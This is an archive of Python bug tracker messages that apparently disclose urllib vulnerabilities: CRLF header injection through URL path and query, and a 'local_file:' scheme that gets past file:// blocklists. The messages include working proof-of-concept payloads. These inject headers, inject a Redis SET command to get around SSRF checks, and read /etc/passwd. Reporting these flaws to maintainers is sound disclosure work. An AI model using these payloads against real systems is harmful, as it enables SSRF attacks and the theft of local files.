[issue30458] [security][CVE-2019-9740][CVE-2019-9947] HTTP Header Injection (follow-up of CVE-2016-5699)
Change by Sihoon Lee : -- pull_requests: +13545 pull_request: https://github.com/python/cpython/pull/12524 ___ Python tracker <https://bugs.python.org/issue30458> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
New submission from Sihoon Lee :
this patch can also be broken by path and query string.
http://www.cvedetails.com/cve/CVE-2016-5699/
https://bugs.python.org/issue30458
can succeed to inject HTTP header and be more critical by bypassing illegal
header check
# Vulnerability PoC
>>> import urllib.request
>>> urllib.request.urlopen('http://127.0.0.1:1234/?q=HTTP/1.1\r\nHeader:
>>> Value\r\nHeader2: \r\n')
or
>>> urllib.request.urlopen('http://127.0.0.1:1234/HTTP/1.1\r\nHeader:
>>> Value\r\nHeader2: \r\n')
> nc -lv 1234
GET /?q=HTTP/1.1
Header: Value
Header2: HTTP/1.1
Accept-Encoding: identity
Host: 127.0.0.1:1234
User-Agent: Python-urllib/3.8
Connection: close
we can inject headers completely.
## Redis
redis also be affected by bypassing SSRF protection checking header "host:"
with this injection.
>>> urllib2.urlopen('http://127.0.0.1:6379/?q=HTTP/1.1\r\nSET VULN
>>> POC\r\nHeader2:\r\n').read()
'$-1\r\n+OK\r\n-ERR unknown command `Header2:`, with args beginning with:
`HTTP/1.1`, \r\n-ERR unknown command `Accept-Encoding:`, with args beginning
with: `identity`, \r\n'
$ redis-cli
127.0.0.1:6379> GET VULN
"POC"
# Root Cause
https://github.com/python/cpython/commit/cc54c1c0d2d05fe7404ba64c53df4b1352ed2262
- _hostprog = re.compile('^//([^/?]*)(.*)$')
+ _hostprog = re.compile('//([^/#?]*)(.*)', re.DOTALL)
It could succeed to parse host because of re.DOTALL
re.DOTALL gave the opportunity of injection.
this version of the commit was 3.4.7+
this vulnerability can be affected 3.4.7+ ~ 3.8-dev <- I tested it.
also, python 2.7.15 can be affected. I don't know which python2 version is
affected because not test.
maybe after the commit, all of higher versions can trigger this vulnerability.
# Conclusion
this patch provides more critical vulnerability to bypass the illegal header
check.
and we can inject HTTP header completely in urlopen() from this patch.
(Although this vulnerability is old on 12 Jul 2017, I don't know why no one has
submitted issue still now XDD)
--
components: Library (Lib)
messages: 334896
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Header Injection in urllib
type: security
versions: Python 2.7, Python 3.4, Python 3.5, Python 3.6, Python 3.7, Python 3.8
___
Python tracker
<https://bugs.python.org/issue35906>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
New submission from Sihoon Lee :
The Unnecessary scheme exists in urlopen() urllib
when people would protect to read file system in HTTP request of urlopen(),
they often filter like this against SSRF.
# Vulnerability PoC
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
the result is
##
# User Database
#
# Note t
but if we use a scheme like this, parsing URL cannot parse scheme with
urlparse()
this is the parsed result.
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='',
query='', fragment='')
def request(url):
from urllib import urlopen
from urlparse import urlparse
result = urlparse(url)
scheme = result.scheme
if not scheme:
return False #raise Exception("Required scheme")
if scheme == 'file':
return False #raise Exception("Don't open file")
res = urlopen(url)
content = res.read()
print url, content[:30]
return True
assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False
if they filter only file://, this mitigation can be bypassed against SSRF.
with this way.
assert request('local-file:/etc/passwd') == True
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='',
query='', fragment='')
parseing URL also can be passed.
# Attack scenario
this is the unnecessary URL scheme("local_file").
even if it has filtering, An Attacker can read arbitrary files as bypassing
with it.
# Root Cause
URLopener::open in urllib.py
from 203 lin
name = 'open_' + urltype
self.type = urltype
name = name.replace('-', '_') #it can also allows local-file
if not hasattr(self, name): #passed here hasattr(URLopener, 'open_local_file')
if proxy:
return self.open_unknown_proxy(proxy, fullurl, data)
else:
return self.open_unknown(fullurl, data)
try:
if data is None:
return getattr(self, name)(url)
else:
return getattr(self, name)(url, data) #return URLopener::open_local_file
it may be just trick because people usually use whitelist (allow only http or
https.
Even if but anyone may use blacklist like filtering file://, they will be
affected with triggering SSRF
--
components: Library (Lib)
messages: 334905
nosy: push0ebp
priority: normal
severity: normal
status: open
title: Unnecessary URL scheme exists to allow file:// reading file in urllib
type: security
versions: Python 2.7
___
Python tracker
<https://bugs.python.org/issue35907>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35909] Zip Slip Vulnerability
Sihoon Lee added the comment: When I had tested it before, It was not worked. Was it really worked? Could you show me your PoC Code? -- nosy: +push0ebp -lars.gustaebel ___ Python tracker <https://bugs.python.org/issue35909> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment: Sorry for my bad English. Yes, exactly. Only python 2.7 has been affected. not python3. So I chose only Python2.7 version. -- ___ Python tracker <https://bugs.python.org/issue35907> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment: and only urllib, not urllib2. -- ___ Python tracker <https://bugs.python.org/issue35907> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Sihoon Lee added the comment: I am not also native English speaker. It's OK. Thank you for reading my report -- ___ Python tracker <https://bugs.python.org/issue35907> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Sihoon Lee added the comment: Sorry, I'm late. My review is here. https://github.com/python/cpython/pull/11768 -- ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Sihoon Lee added the comment: Yes, I thought so. before the commit version i said, the previous version(~3.4.6), raised an exception(no host given~) in urlopen failing parsing host. If this patch wants to be same as the previous version, It is right to raise an exception like the previous version. I thought there is no exact answer, only depends on Python features. -- ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] Unnecessary URL scheme exists to allow file:// reading file in urllib
Change by Sihoon Lee : -- keywords: +patch pull_requests: +11872 stage: needs patch -> patch review ___ Python tracker <https://bugs.python.org/issue35907> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Change by Sihoon Lee : -- pull_requests: +12474 ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Change by Sihoon Lee : -- pull_requests: -12474 ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Change by Sihoon Lee : -- pull_requests: +12475 ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Change by Sihoon Lee : -- pull_requests: +12476 ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35906] Header Injection in urllib
Change by Sihoon Lee : -- pull_requests: -12476 ___ Python tracker <https://bugs.python.org/issue35906> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
[issue35907] [security][CVE-2019-9948] Unnecessary URL scheme exists to allow local_file:// reading file in urllib
Sihoon Lee added the comment: If developers allow only http:// or https:// as whitelist, it has no problem. But, If someone blocks only one file://, attacker can bypass it. This issue may provides attacker with bypassing method as new scheme. -- ___ Python tracker <https://bugs.python.org/issue35907> ___ ___ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
